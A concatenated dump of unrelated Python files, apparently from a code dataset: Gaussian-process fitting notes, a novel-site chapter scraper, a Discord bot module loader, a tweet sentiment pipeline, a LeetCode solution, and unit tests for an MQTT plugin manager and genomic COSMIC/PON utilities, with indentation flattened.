# #Now undo mod 2pi and work out where to put new datapoint estimates (both in one loop for efficiency)
# #TO DO - Work out an average gradient of the graph?
# #For now, hard code some stuff in
# gap =[]
# #If consecutive datapoints are more than ~2pi apart then add 2pi to all consecutive datapoints
# for i in range(0, len(tAv) - 1): #Loop over entire dataset
# #Check for discontinuity - if phs gap is big then discont
# #If big time gap with little increase then time gap
# if pAv[i+1] - pAv[i] > standardWrapCheck*cmath.pi or tAv[i+1] - tAv[i] > timeGap and pAv[i+1] - pAv[i] < gapWrapCheck :
# #If discont, add on pi for every subsequent value - every time for every discont
# for j in range(i + 1, len(pAv)):
# pAv[j] = pAv[j] + 2*cmath.pi
# #Check for gaps in data to be filled in by GP
# if tAv[i+1] - tAv[i] > fillTimeGap: #Check for timegaps larger than two dp
# #Large timegap, fill in the gap with data appearing at roughtly the sampling rate
# temp = np.linspace(tAv[i], tAv[i+1], int((tAv[i+1] - tAv[i])/sampleRate))
# gap = np.append(gap, temp) #min, max, number of points
#
# #Uncomment to plot data after mod 2pi has been sorted (will plot all graphs!)
#
# #Also write where the gaps are t a different
# with open("{}gapdatafile.txt".format(i), 'wb+') as datafile_id:
# #Write the data, formatted and separated by a comma
# np.savetxt(datafile_id, gap, fmt=['%.2f'], delimiter=',')
#
#"""
#calculating parameters is now in next code
"""
#Now fit this data using a Guassian model
#CALCULATE COVARIANCE MATRIX - Use relevent kernals For now, use two exp kernels
# Squared exponential kernel, takes into account long term rise
k1 = 1**2 * kernels.ExpSquaredKernel(metric=1**2)
#rSquared exponential kernel,
#k2 = 1**2 * kernels.ExpSquaredKernel(metric=100**2)
#combine kernals
kernel = k1 # + k2
#initiates combines kernels in george library
gp = george.GP(kernel, mean=np.mean(pAv), fit_mean=True)
#compues covarience matrix - wants an array, not a list
#gp.compute(tAv)
"""
"""
#******************************************************************
#NOW OPTIMISING PARAMETERS
#theres an optimising function in the scipy library
#need to feed in a function to optimise and the gradient of the function
#the function to optimise is the log liklihood, which is on the george library
# Define the objective function (negative log-likelihood in this case).
def nll(p):
gp.set_parameter_vector(p)
ll = gp.log_likelihood(y, quiet=True)
return -ll if np.isfinite(ll) else 1e25
# And the gradient of the objective function.
def grad_nll(p):
gp.set_parameter_vector(p)
return -gp.grad_log_likelihood(y, quiet=True)
# You need to compute the GP once before starting the optimization.
gp.compute(t)
# Print the initial ln-likelihood.
print(gp.log_likelihood(y))
# Run the optimization routine.
#initial parameter estimates
p0 = gp.get_parameter_vector()
#feed into optimisation routine
results = op.minimize(nll, p0, jac=grad_nll, method="L-BFGS-B")
# Update the kernel and print the final log-likelihood.
gp.set_parameter_vector(results.x)
print(gp.log_likelihood(y))
"""
"""
#plot results
#plt.figure()
x = np.linspace(min(tAv), max(tAv), 20000)
mu, var = gp.predict(pAv, x, return_var=True)
#std = np.sqrt(var)
#plt.scatter(tAv, pAv)
#plt.fill_between(x, mu+std, mu-std, color="g", alpha=0.5)
"""
|
#coding: utf-8
from pyquery import PyQuery as pyq
import uctxt_content
url = "http://www.uctxt.com/book/17/17785/"
doc = pyq(url)
# print doc
dl = doc('dl')
titles = dl('a')
count = dl.children().length
urlContents = []
for x in xrange(0,count):
a = titles.eq(x)
href = a.attr('href')
urlContent = url+href
urlContents.append(urlContent)
for k,v in enumerate(urlContents):
print k,v
contentURL_1 = urlContents[0]
print contentURL_1
contentObj = PaserUCTxtContent(urlContents[0])
contentObj.paser()
|
from discord.ext.commands import Bot
import asyncio
import logging
import colorlog
from importlib import import_module, reload
from collections import namedtuple
from inspect import iscoroutinefunction, isfunction
from functools import partial, wraps
from contextlib import suppress
import pkgutil
import sys
from websockets import ConnectionClosed
from . import config
from .utils import isiterable
from .rich_guild import guilds, register_bot
from .crossmodule import CrossModule
from collections import namedtuple, deque, defaultdict
import threading
import traceback
MODUBOT_MAJOR = '0'
MODUBOT_MINOR = '1'
MODUBOT_REVISION = '3'
MODUBOT_VERSIONTYPE = 'rm'
MODUBOT_SUBVERSION = '1'
MODUBOT_VERSION = '{}.{}.{}-{}{}'.format(MODUBOT_MAJOR, MODUBOT_MINOR, MODUBOT_REVISION, MODUBOT_VERSIONTYPE, MODUBOT_SUBVERSION)
MODUBOT_STR = 'ModuBot {}'.format(MODUBOT_VERSION)
class ModuBot(Bot):
ModuleTuple = namedtuple('ModuleTuple', ['name', 'module', 'module_spfc_config'])
def __init__(self, *args, logname = "ModuBot", conf = config.ConfigDefaults, loghandlerlist = [], **kwargs):
self.bot_version = (MODUBOT_MAJOR, MODUBOT_MINOR, MODUBOT_REVISION, MODUBOT_VERSIONTYPE, MODUBOT_SUBVERSION)
self.bot_str = MODUBOT_STR
self.thread = None
self.config = conf
self.crossmodule = CrossModule()
self.log = logging.getLogger(logname)
for handler in loghandlerlist:
self.log.addHandler(handler)
self.log.setLevel(self.config.debug_level)
super().__init__(command_prefix = self.config.command_prefix, *args, **kwargs)
self.help_command = None
self.looplock = threading.Lock()
self._init = False
self._owner_id = None
if self.config.owner_id.isdigit():
self._owner_id = int(self.config.owner_id)
elif self.config.owner_id:
self._owner_id = self.config.owner_id
async def _load_modules(self, modulelist):
# TODO: change into cog pre_init, cog init and cog post_init/ deps listing inside cogs
# 1: walk module
# 1: module pre_init
# this stage should be use to read up config and prepare things such as opening
# port to communicate with server, opening file for logging, register stuff to
# crossmodule object (except features), etc. pre_init must throw if not successful
# 2: walk module again
# 1: load command, cogs, ...
# even if some command, cogs in a module is not loaded, it will not get skip
# 2: module init
# this stage should be use to check commands in the module that got loaded and
# register features available after loaded. init must throw if not successful
# 3: walk module again
# 1: module post_init
# this stage should be use to check if dependency loaded correctly with features
# needed and register dependencies needed. post_init must throw if not successful
# 2: add to loaded
# 4: walk module again
# 1: module after_init
# this means that stuff in crossmodule is safe to be retrieve. shall not fail
load_cogs = []
available_module = set(self.crossmodule.imported.keys())
for moduleinfo in modulelist:
available_module.add(moduleinfo.name)
requirements = defaultdict(list)
for moduleinfo in modulelist:
if 'deps' in dir(moduleinfo.module):
self.log.debug('resolving deps in {}'.format(moduleinfo.name))
deps = getattr(moduleinfo.module, 'deps')
if isiterable(deps):
for dep in deps:
requirements[dep].append(moduleinfo.name)
else:
self.log.debug('deps is not an iterable')
req_set = set(requirements.keys())
noreq_already = req_set - available_module
noreq = list(noreq_already)
req_not_met = set()
while noreq:
current = noreq.pop()
req_not_met.update(requirements[current])
for module in requirements[current]:
if module not in noreq_already:
noreq.append(module)
noreq_already.add(module)
if req_not_met:
self.log.warning('These following modules does not have dependencies required and will not be loaded: {}'.format(str(req_not_met)))
modulelist = [moduleinfo for moduleinfo in modulelist if moduleinfo.name not in req_not_met]
for moduleinfo in modulelist:
self.crossmodule._add_module(moduleinfo.name, moduleinfo.module)
for moduleinfo in modulelist:
if 'deps' in dir(moduleinfo.module):
self.log.debug('adding deps in {}'.format(moduleinfo.name))
deps = getattr(moduleinfo.module, 'deps')
if isiterable(deps):
self.crossmodule._register_dependency(moduleinfo.name, deps)
else:
self.log.debug('deps is not an iterable')
for moduleinfo in modulelist:
if 'cogs' in dir(moduleinfo.module):
cogs = getattr(moduleinfo.module, 'cogs')
if isiterable(cogs):
for cog in cogs:
cg = cog()
if 'pre_init' in dir(cg):
self.log.debug('executing pre_init in {}'.format(cg.qualified_name))
potential = getattr(cg, 'pre_init')
self.log.debug(str(potential))
self.log.debug(str(potential.__func__))
try:
if iscoroutinefunction(potential.__func__):
await potential(self, moduleinfo.module_spfc_config)
elif isfunction(potential.__func__):
potential(self, moduleinfo.module_spfc_config)
else:
self.log.debug('pre_init is neither funtion nor coroutine function')
except Exception:
self.log.warning('failed pre-initializing cog {} in module {}'.format(cg.qualified_name, moduleinfo.name))
self.log.debug(traceback.format_exc())
load_cogs.append((moduleinfo.name, cg))
else:
self.log.debug('cogs is not an iterable')
for moduleinfo in modulelist:
if 'commands' in dir(moduleinfo.module):
self.log.debug('loading commands in {}'.format(moduleinfo.name))
commands = getattr(moduleinfo.module, 'commands')
if isiterable(commands):
for command in commands:
cmd = command()
self.add_command(cmd)
self.crossmodule._commands[moduleinfo.name].append(cmd.name)
self.log.debug('loaded {}'.format(cmd.name))
else:
self.log.debug('commands is not an iterable')
for modulename, cog in load_cogs.copy():
if 'init' in dir(cog):
self.log.debug('executing init in {}'.format(cog.qualified_name))
potential = getattr(cog, 'init')
self.log.debug(str(potential))
self.log.debug(str(potential.__func__))
try:
if iscoroutinefunction(potential.__func__):
await potential()
elif isfunction(potential.__func__):
potential()
else:
self.log.debug('init is neither funtion nor coroutine function')
except Exception:
self.log.warning('failed initializing cog {} in module {}'.format(cog.qualified_name, modulename))
self.log.debug(traceback.format_exc())
load_cogs.remove((modulename, cog))
for modulename, cog in load_cogs:
if 'post_init' in dir(cog):
self.log.debug('executing post_init in {}'.format(cog.qualified_name))
potential = getattr(cog, 'post_init')
self.log.debug(str(potential))
self.log.debug(str(potential.__func__))
try:
if iscoroutinefunction(potential.__func__):
await potential()
elif isfunction(potential.__func__):
potential()
else:
self.log.debug('post_init is neither funtion nor coroutine function')
except Exception:
self.log.warning('failed post-initializing cog {} in module {}'.format(cog.qualified_name, modulename))
self.log.debug(traceback.format_exc())
load_cogs.remove((modulename, cog))
self.log.debug('loading cogs')
for modulename, cog in load_cogs:
self.add_cog(cog)
self.crossmodule._cogs[modulename].append(cog)
self.log.debug('loaded {}'.format(cog.qualified_name))
for modulename, cog in load_cogs:
if 'after_init' in dir(cog):
self.log.debug('executing after_init in {}'.format(cog.qualified_name))
potential = getattr(cog, 'after_init')
self.log.debug(str(potential))
self.log.debug(str(potential.__func__))
try:
if iscoroutinefunction(potential.__func__):
await potential()
elif isfunction(potential.__func__):
potential()
else:
self.log.debug('after_init is neither funtion nor coroutine function')
except Exception:
self.log.error('cog {} in module {} raised exception after initialization'.format(cog.qualified_name, modulename))
self.log.debug(traceback.format_exc())
self.remove_cog(cog)
self.crossmodule._cogs[modulename].remove(cog)
async def _prepare_load_module(self, modulename):
if modulename in self.crossmodule.modules_loaded():
await self.unload_modules([modulename])
try:
reload(self.crossmodule.imported[modulename])
except:
pass
module = self.crossmodule.imported[modulename]
else:
try:
module = import_module('.modules.{}'.format(modulename), 'bot')
except:
pass
return
return module
async def _gen_modulelist(self, modulesname_config):
modules = list()
for modulename, moduleconfig in modulesname_config:
module = await self._prepare_load_module(modulename)
if module:
modules.append(self.ModuleTuple(modulename, module, moduleconfig))
return modules
async def load_modules(self, modulesname_config):
modulelist = await self._gen_modulelist(modulesname_config)
await self._load_modules(modulelist)
async def unload_modules(self, modulenames, *, unimport = False):
# 1: unload dependents
# 2: unload command, cogs, ...
# 4: remove from loaded
# 5: module uninit
def gendependentlist():
deplist = list()
considerdeque = deque(modulenames)
considerset = set(modulenames)
while considerdeque:
node = considerdeque.pop()
deplist.append(node)
for module in self.crossmodule._module_graph[node]:
if module not in considerset:
considerdeque.append(module)
considerset.add(module)
return deplist
unloadlist = gendependentlist()
unloadlist.reverse()
for module in unloadlist:
for cog in self.crossmodule._cogs[module]:
if 'uninit' in dir(cog):
self.log.debug('executing uninit in {}'.format(cog.qualified_name))
potential = getattr(cog, 'uninit')
self.log.debug(str(potential))
self.log.debug(str(potential.__func__))
if iscoroutinefunction(potential.__func__):
await potential()
elif isfunction(potential.__func__):
potential()
else:
self.log.debug('uninit is neither funtion nor coroutine function')
self.remove_cog(cog)
for command in self.crossmodule._cogs[module]:
self.remove_command(command)
self.crossmodule._remove_module(module)
self.log.debug('unloaded {}'.format(module))
if unimport:
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
for p_submodule in list(sys.modules.keys()):
if _is_submodule(module, p_submodule):
del sys.modules[p_submodule]
self.log.debug('unimported {}'.format(module))
async def unload_all_module(self):
await self.unload_modules(self.crossmodule.modules_loaded())
async def on_ready(self):
self.log.info("Connected")
self.log.info("Client:\n ID: {id}\n name: {name}#{discriminator}\n".format(
id = self.user.id,
name = self.user.name,
discriminator = self.user.discriminator
))
register_bot(self)
app_info = await self.application_info()
if self._owner_id == 'auto' or not self._owner_id:
self.log.info('Using application\'s owner')
self._owner_id = app_info.owner.id
else:
if not self.get_user(self._owner_id):
self.log.warning('Cannot find specified owner, falling back to application\'s owner')
self._owner_id = app_info.owner.id
self.log.info("Owner:\n ID: {id}\n name: {name}#{discriminator}\n".format(
id = self._owner_id,
name = self.get_user(self._owner_id).name,
discriminator = self.get_user(self._owner_id).discriminator
))
self._init = True
for name, cog in self.cogs.items():
if 'on_ready' in dir(cog):
self.log.debug('executing on_ready in {}'.format(name))
potential = getattr(cog, 'on_ready')
self.log.debug(str(potential))
self.log.debug(str(potential.__func__))
if iscoroutinefunction(potential.__func__):
await potential()
elif isfunction(potential.__func__):
potential()
else:
self.log.debug('post_init is neither funtion nor coroutine function')
def run(self):
self.thread = threading.currentThread()
self.log.debug('running bot on thread {}'.format(threading.get_ident()))
self.looplock.acquire()
self.loop.create_task(self.start(self.config.token))
self.loop.run_forever()
async def _logout(self):
await super().logout()
await self.unload_all_module()
self.log.debug('finished cleaning up')
def logout_loopstopped(self):
self.log.debug('on thread {}'.format(threading.get_ident()))
self.log.info('logging out (loopstopped)..')
self.loop.run_until_complete(self._logout())
self.log.info('canceling incomplete tasks...')
gathered = asyncio.gather(*asyncio.Task.all_tasks(self.loop), loop=self.loop)
gathered.cancel()
async def await_gathered():
with suppress(asyncio.CancelledError):
await gathered
self.loop.run_until_complete(await_gathered())
self.log.info('closing loop...')
self.loop.close()
self.log.info('finished!')
def logout_looprunning(self):
async def _stop():
self.loop.stop()
self.looplock.release()
self.log.debug('on thread {}'.format(threading.get_ident()))
self.log.debug('bot\'s thread status: {}'.format(self.thread.is_alive()))
self.log.info('logging out (looprunning)..')
future = asyncio.run_coroutine_threadsafe(self._logout(), self.loop)
future.result()
self.log.debug('stopping loop...')
future = asyncio.run_coroutine_threadsafe(_stop(), self.loop)
self.looplock.acquire()
self.log.info('canceling incomplete tasks...')
gathered = asyncio.gather(*asyncio.Task.all_tasks(self.loop), loop=self.loop)
gathered.cancel()
async def await_gathered():
with suppress(asyncio.CancelledError, ConnectionClosed):
await gathered
self.loop.run_until_complete(await_gathered())
self.log.info('closing loop...')
self.loop.close()
self.log.info('finished!')
def logout(self):
self.log.info('logging out...')
if self.loop.is_running():
self.logout_looprunning()
else:
self.logout_loopstopped()
class check_online:
def __call__(self, func):
@wraps(func)
async def wrapper(bot, *args, **kwargs):
if bot._init:
return await func(bot, *args, **kwargs)
else:
raise Exception('bot is not online')
return wrapper
@check_online()
async def get_owner_id(self):
return self._owner_id
def online(self):
return self._init |
import json
info = {
'name': 'alex',
'age': 32
}
f = open('test.txt', 'w')
# f.write(str(info))
# print(json.dumps(info))
f.write(json.dumps(info))
f.close()
|
import pandas as pd
import numpy as np
import click
from preprocessing import apply_preprocessing, apply_preprocessing_bert
from data_loading import load_tweets, load_test_tweets, split_data, seed_everything, split_data_bert
from models.bi_lstm import run_bidirectional_lstm
from models.machine_learning_models import run_tfidf_ml_model
from models.few_shot import run_zero_shot
from models.bert import run_bert, predict_bert
MODEL_FOLDER = '../models'
model_name = 'digitalepidemiologylab/covid-twitter-bert'
seed_everything()
def run_training(model='lg', save_model=False):
"""
Loads data, preprocesses data and trains chosen model
:param model: str of the model to be ran
:param save_model: boolean indicating whether the model should be saved or not
"""
# Load data
tweets = load_tweets(sample=True, frac=1)
# Data preprocessing
if model == 'bert':
tweets = apply_preprocessing_bert(tweets)
else:
tweets = apply_preprocessing(tweets)
# Training
if model in ['tfidf']:
run_tfidf_ml_model(tweets=tweets[['tweet']],
labels=tweets[['polarity']],
save_model=save_model,
model='nb')
elif model in ["word2vec", "glove"]:
run_bidirectional_lstm(tweets=tweets[['tweet']],
labels=tweets[['polarity']],
save_model=save_model,
embeddings=model)
elif model in ["bert"]:
train_tweets, val_tweets = split_data_bert(tweets)
run_bert(train_tweets=train_tweets,
val_tweets=val_tweets,
save_model=save_model)
elif model in ["zero"]:
train_data, val_data = split_data(tweets)
run_zero_shot(train_tweets=train_data[['tweet']],
train_y=train_data[['polarity']],
val_tweets=val_data[['tweet']],
val_y=val_data[['polarity']])
else:
raise NotImplementedError('Please select a valid model option.')
def run_inference(final_model_name="bert_0"):
"""
Makes predictions using the test set and the trained models.
:param final_model_name: str of the model to make prediction with
"""
# Load test data
test_tweets = load_test_tweets()
test_tweets['polarity'] = test_tweets.id # to use same preprocessing function
# Preprocessing
dataset = apply_preprocessing_bert(test_tweets)
# Make predictions
test_ids_list, binary_preds_list = predict_bert(dataset, final_model_name)
# Save predictions
test_ids = np.concatenate(test_ids_list).ravel()
binary_preds = np.concatenate(binary_preds_list).ravel()
binary_preds = np.where(binary_preds == 0, -1, binary_preds)
results = pd.DataFrame({'Id': test_ids, 'Prediction': binary_preds})
results.to_csv("./../predictions/predictions.csv", index=False)
@click.command()
@click.option('--model', '-m', default='bert', help='The model to run. You can choose between: '
'glove`, `word2vec`, `bert` or `zero`')
@click.option('--pipeline', '-p', default='training', help='The type of the pipeline. '
'You can choose between `training`, `inference` or `both`.')
def run_pipeline(model, pipeline='inference'):
"""
Runs either training, inference or the complete pipeline
:param model: str, `glove` or `word2vec` or `bert` or `zero`
:param pipeline: str, `training` or `inference`
"""
if pipeline == 'training':
run_training(model=model, save_model=False)
elif pipeline == 'inference':
run_inference()
elif pipeline == 'both': # both
run_training(model=model, save_model=True)
run_inference()
else:
raise ValueError('Please select a valid option for pipeline.')
if __name__ == '__main__':
run_pipeline()
|
#题目地址:https://leetcode-cn.com/problems/plus-one/
class Solution:
def plusOne(self, digits: 'List[int]') -> 'List[int]':
n = len(digits)#获取原来数组的长度
temp = [0] * n#生成一个与原数组相同长度的全0数组
up = 0#是否进位
last = digits[-1]#最低位的数字[4,3,2,1][-1] => 1
last += 1#将最低位的数字+1
if last == 10:#判断+1后是否是10
temp[-1] = 0#如果是0,则最低位更新为0
up = 1#表示有一个进位
else:
temp[-1] = last#没有进位
for i in range(n-2,-1,-1):
cur = digits[i]#从倒数第二位开始,向左(高位)循环
cur += up#增加进位(up的值可以取0表示没有进位,可以取1表示有进位)
if cur == 10:#进一步判断是否会产生新的进位
temp[i] = 0
up = 1
else:
temp[i] = cur
up = 0
if up == 1:#当循环结束的时候,已经计算到了最高位(index=0的位置),如果还存在进位
temp.insert(0,1)#则在结果数组的左端(index=0的位置),插入一个1
return temp#返回结果数组
if __name__ == '__main__':
S = Solution()
result = S.plusOne([4,3,2,1])
print(result)
# a = [1,2,3,4,5]#list
# # for i in range(len(a)-1,-1,-1):
# # print(a[i])
# #range(10) == range(0,10) ==range(0, 10, 1)
# #从谁开始 到谁结束(不含) 步进
# # for i in range(9,-1,-1):#倒序4
# # print(i)
# b = []
# #b = a[:]
# #b = a.copy()
# b.extend(a)
# print(b) #10,9,2……
# # a.reverse()#1倒序
# # for x in b:
# # print(x)
# # for x in reversed(a):#2倒序
# # print(x)
# # for x in a[::-1]:#3倒序
# # print(x)
|
# Copyright (c) 2015 Nicolas JOUANIN
#
# See the file license.txt for copying permission.
import unittest
import logging
import asyncio
from hbmqtt.plugins.manager import PluginManager
formatter = "[%(asctime)s] %(name)s {%(filename)s:%(lineno)d} %(levelname)s - %(message)s"
logging.basicConfig(level=logging.INFO, format=formatter)
class TestPlugin:
def __init__(self, context):
self.context = context
class EventTestPlugin:
def __init__(self, context):
self.context = context
self.test_flag = False
self.coro_flag = False
@asyncio.coroutine
def on_test(self, *args, **kwargs):
self.test_flag = True
self.context.logger.info("on_test")
@asyncio.coroutine
def test_coro(self, *args, **kwargs):
self.coro_flag = True
@asyncio.coroutine
def ret_coro(self, *args, **kwargs):
return "TEST"
class TestPluginManager(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
def test_load_plugin(self):
manager = PluginManager("hbmqtt.test.plugins", context=None)
self.assertTrue(len(manager._plugins) > 0)
def test_fire_event(self):
@asyncio.coroutine
def fire_event():
yield from manager.fire_event("test")
yield from asyncio.sleep(1, loop=self.loop)
yield from manager.close()
manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
self.loop.run_until_complete(fire_event())
plugin = manager.get_plugin("event_plugin")
self.assertTrue(plugin.object.test_flag)
def test_fire_event_wait(self):
@asyncio.coroutine
def fire_event():
yield from manager.fire_event("test", wait=True)
yield from manager.close()
manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
self.loop.run_until_complete(fire_event())
plugin = manager.get_plugin("event_plugin")
self.assertTrue(plugin.object.test_flag)
def test_map_coro(self):
@asyncio.coroutine
def call_coro():
yield from manager.map_plugin_coro('test_coro')
manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
self.loop.run_until_complete(call_coro())
plugin = manager.get_plugin("event_plugin")
self.assertTrue(plugin.object.test_coro)
def test_map_coro_return(self):
@asyncio.coroutine
def call_coro():
return (yield from manager.map_plugin_coro('ret_coro'))
manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
ret = self.loop.run_until_complete(call_coro())
plugin = manager.get_plugin("event_plugin")
self.assertEqual(ret[plugin], "TEST")
def test_map_coro_filter(self):
"""
Run plugin coro but expect no return as an empty filter is given
:return:
"""
@asyncio.coroutine
def call_coro():
return (yield from manager.map_plugin_coro('ret_coro', filter_plugins=[]))
manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
ret = self.loop.run_until_complete(call_coro())
self.assertTrue(len(ret) == 0)
|
from cosmic_pons import (read_pon_list, read_cosmic, read_pon, tabulate_pon,
remove_empty)
from io import StringIO
import pytest
import pandas as pd
from pandas.testing import assert_frame_equal as afe
from numpy.testing import assert_array_equal as aae
def test_read_pon_list():
pon_list = StringIO('pon1\n/sys/pon2\npon3')
assert read_pon_list(pon_list) == 'pon1 /sys/pon2 pon3'.split()
pon_list = StringIO('pon1\n/sys/pon2\npon3\n')
assert read_pon_list(pon_list) == 'pon1 /sys/pon2 pon3'.split()
pon_list = StringIO('pon1')
assert read_pon_list(pon_list) == ['pon1']
pon_list = StringIO('')
assert read_pon_list(pon_list) == []
def test_read_cosmic():
cosmic = StringIO(
'Accession Number\tMutation genome position\n'
'ENST297338\t8:117869609-117869609\n'
'ENST288602\t\n'
'ENST440973\t6:152129237-152129237\n'
'ENST440974\t6:152129237-152129238\n'
'ENST440975\t6:152129236-152129238\n'
)
expected = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\n'
'ENST297338\t8\t117869609\t117869609\n'
'ENST440973\t6\t152129237\t152129237\n'
'ENST440974\t6\t152129237\t152129238\n'
'ENST440975\t6\t152129236\t152129238\n'
), sep='\t')
aae(read_cosmic(cosmic).values, expected.values)
def test_read_pon():
vcf = StringIO(
'##tumor_sample=P9-C3\n'
'#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n'
'1\t10146\t.\tAC\tA\t.\t.\t.\n'
'1\t10151\t.\tTA\tT,GA\t.\t.\t.\n'
'1\t10403\t.\tACCCTAACCCTAACCCTAACCCTAACCCTAACCCTAAC\tA\t.\t.\t.\n'
'1\t10415\t.\tACCCTAACCCTAACCCTAACCCTAAC\tA\t.\t.\t.\n'
'hs37d5\t35466424\t.\tG\tGATTCC\t.\t.\t.\n'
'hs37d5\t35466456\t.\tC\tT\t.\t.\t.\n'
'X\t155260422\t.\tAGGGGTTAGGGGTTAG\tAGGGTTAGGGGTTAG,A\t.\t.\t.\n'
'Y\t2661694\t.\tA\tG\t.\t.\t.\n'
'MT\t151\t.\tCT\tTT,TC\t.\t.\t.'
)
result = read_pon(vcf)
expected = pd.read_csv(StringIO(
'chrom\tpos\n'
'1\t10146\n'
'1\t10151\n'
'1\t10403\n'
'1\t10415\n'
), sep='\t')
afe(result, expected)
def test_tabulate_pon():
cosmic = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\n'
'ENST297338\t8\t117869609\t117869609\n'
'ENST440973\t6\t152129237\t152129237\n'
'ENST440974\t6\t152129237\t152129238\n'
'ENST440975\t6\t152129236\t152129238\n'
), sep='\t')
pon = pd.read_csv(StringIO(
'chrom\tpos\n'
'1\t10151\n'
'1\t10403\n'
'1\t10415\n'
), sep='\t')
result = tabulate_pon(cosmic, pon, 'test')
afe(result, cosmic)
pon = pd.read_csv(StringIO(
'chrom\tpos\n'
'8\t117869609\n'
'1\t10403\n'
'1\t10415\n'
), sep='\t')
cosmic = tabulate_pon(cosmic, pon, 'test')
expected = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\ttest\n'
'ENST297338\t8\t117869609\t117869609\t1\n'
'ENST440973\t6\t152129237\t152129237\t0\n'
'ENST440974\t6\t152129237\t152129238\t0\n'
'ENST440975\t6\t152129236\t152129238\t0\n'
), sep='\t')
afe(cosmic, expected)
pon = pd.read_csv(StringIO(
'chrom\tpos\n'
'8\t117869609\n'
'6\t152129235\n'
'6\t152129236\n'
'6\t152129237\n'
'6\t152129238\n'
'6\t152129239\n'
), sep='\t')
cosmic = tabulate_pon(cosmic, pon, 'test2')
expected = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
'ENST297338\t8\t117869609\t117869609\t1\t1\n'
'ENST440973\t6\t152129237\t152129237\t0\t1\n'
'ENST440974\t6\t152129237\t152129238\t0\t2\n'
'ENST440975\t6\t152129236\t152129238\t0\t3\n'
), sep='\t')
afe(cosmic, expected)
def test_remove_empty():
cosmic = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\n'
'ENST297338\t8\t117869609\t117869609\n'
'ENST440973\t6\t152129237\t152129237\n'
'ENST440974\t6\t152129237\t152129238\n'
'ENST440975\t6\t152129236\t152129238\n'
), sep='\t')
with pytest.raises(ValueError) as e:
remove_empty(cosmic)
assert 'No matches to write' in str(e)
cosmic = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
'ENST297338\t8\t117869609\t117869609\t1\t1\n'
'ENST440973\t6\t152129237\t152129237\t0\t1\n'
'ENST440974\t6\t152129237\t152129238\t0\t2\n'
'ENST440975\t6\t152129236\t152129238\t0\t3\n'
), sep='\t')
afe(cosmic, remove_empty(cosmic))
cosmic = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
'ENST297338\t8\t117869609\t117869609\t1\t1\n'
'ENST440973\t6\t152129237\t152129237\t0\t0\n'
'ENST440974\t6\t152129237\t152129238\t0\t2\n'
'ENST440975\t6\t152129236\t152129238\t0\t0\n'
), sep='\t')
expected = pd.read_csv(StringIO(
'Accession Number\tchrom\tstart\tend\ttest\ttest2\n'
'ENST297338\t8\t117869609\t117869609\t1\t1\n'
'ENST440974\t6\t152129237\t152129238\t0\t2\n'
), sep='\t')
aae(expected.values, remove_empty(cosmic).values)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.